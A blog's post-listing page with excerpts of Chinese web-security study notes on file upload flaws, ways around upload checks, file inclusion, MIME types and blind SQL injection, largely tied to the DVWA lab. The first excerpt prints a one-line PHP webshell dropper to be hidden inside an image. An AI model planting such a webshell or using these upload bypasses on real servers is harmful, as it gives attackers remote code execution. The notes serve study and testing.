- 博客(8)
- 收藏
- 关注
RSS订阅原创 edjpgcom制作一句话图片木马
将图片直接拖到edjpgcom.exe程序上写入一句话木马<?fputs(fopen("shell1.php","w"),'<?php @eval($_POST[caidao]);?>')?>查看图片
2019-06-19 22:13:37
6895
2
原创 DVWA之File Upload文件上传
LOW:函数介绍:basename()函数返回路径中的文件名部分。string basename ( string $path [, string $suffix ] )参数介绍:$path:必需。规定要检查的路径。在Windows中,斜线(/)和反斜线(\)都可以用作目录分隔符。在其它环境下是斜线(/)。$suffix:可选。规定文件扩展名。如果文件有suffix,则不会输出这个...
2019-06-19 22:13:27
419
2
原创 文件包含漏洞小结
1. 原理在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。开发过程中,多个文件都会用到的代码,通常会放到一个单独的文件中,用到时再包含进来。当把包含的文件写死在程序中时,该漏洞是不存在的,但很多情况都会动态的去包含所需的文件,这时候则会产生文件包含漏洞。实例代码<?php $filename...
2019-06-19 11:07:51
510
原创 文件上传校验方式及绕过思路
文件上传校验方式客户端javascript校验(一般只校验后缀名)服务端校验文件头content-type字段校验(image/gif)文件内容头校验(GIF89a)后缀名黑名单校验后缀名白名单校验自定义正则校验WAF设备校验(根据不同的WAF产品而定)1. 客户端校验一般都是在网页上写一段javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式。判断...
2019-06-17 22:48:44
7490
1
原创 文件上传漏洞
原理一些web应用程序中允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中,再通过url去访问以执行代码。漏洞起因对于上传文件的后缀名没有做严格的限制对于上传文件的MIMETYPE没有做检查没有限制上传的文件的文件权限对于上传文件或者指定目录的行为没有做限制漏洞测试过程正常上传,抓包分析尝试上传不同类型的恶意脚本文...
2019-06-17 22:44:32
193
原创 常用MIME Type表
多用途互联网邮件扩展(MIME,MultipurposeInternet Mail Extensions)是一个互联网标准,它扩展了电子邮件标准,使其能够支持非ASCII字符、二进制格式附件等多种格式的邮件消息。内容类型(Content-Type),这个头部领域用于指定消息的类型。一般以下面的形式出现。[type]/[subtype]text/plain(纯文本) text/html(HT...
2019-06-16 22:33:51
426
原创 布尔型盲注基本思路
普通SQL注入SQL盲注执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注)一般在页面上直接就会显示执行sql语句的结果一般在页面上不会直接显示sql执行的结果有可能出现不确定sql是否执...
2019-06-10 21:42:56
2367
1
原创 SQL注入中常用的函数
mid()函数SELECT MID(ColumnName, Start [, Length])从指定字段中提取出字段的内容column_name:字段名start:开始位置length:长度实例Persons 表:IdLastNameFirstNameAddressCity1AdamsJohnOxfordStreet2BushGeorge...
2019-06-09 19:42:32
4593
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人